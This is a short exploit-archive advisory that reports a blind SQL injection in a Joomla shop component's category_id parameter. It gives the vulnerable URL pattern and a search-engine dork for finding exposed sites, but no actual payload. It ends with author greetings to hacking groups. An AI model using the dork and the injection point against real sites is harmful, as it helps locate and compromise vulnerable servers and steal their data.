id: 13208
date: 07/14/2010
title: Joomla Component (shop.browse) Blind SQL Injection Vulnerability
author: ThE DarK
cves: 

================================================================
Joomla Component (shop.browse) Blind SQL Injection Vulnerability
================================================================


# Exploit Title: joomla (shop.browse) Blind SQL Injection Vulnerability
# Date: 14/7/2010
# Author:ThE DarK
# E-MaiL : Mu0@Hotmail.com
# Software Link: Not available :p
# Version: shop.browse
# Platform / Tested on: Windows XP
# Code : www.site.com/index.php?page=shop.browse&category_id=[BSQL]
# Dork : inurl:"index.php?page=shop.browse&category_id="

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
D3M0 : www.site.com/index.php?page=shop.browse&category_id=[BSQL]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Gr33Tz T0 : Sn!pEr.S!Te , **RoAd_KiLlEr** , Gaza Hacker Team


NoTe : I'm Muslim ..!! :D 



#  0day.today [2023-03-25]  #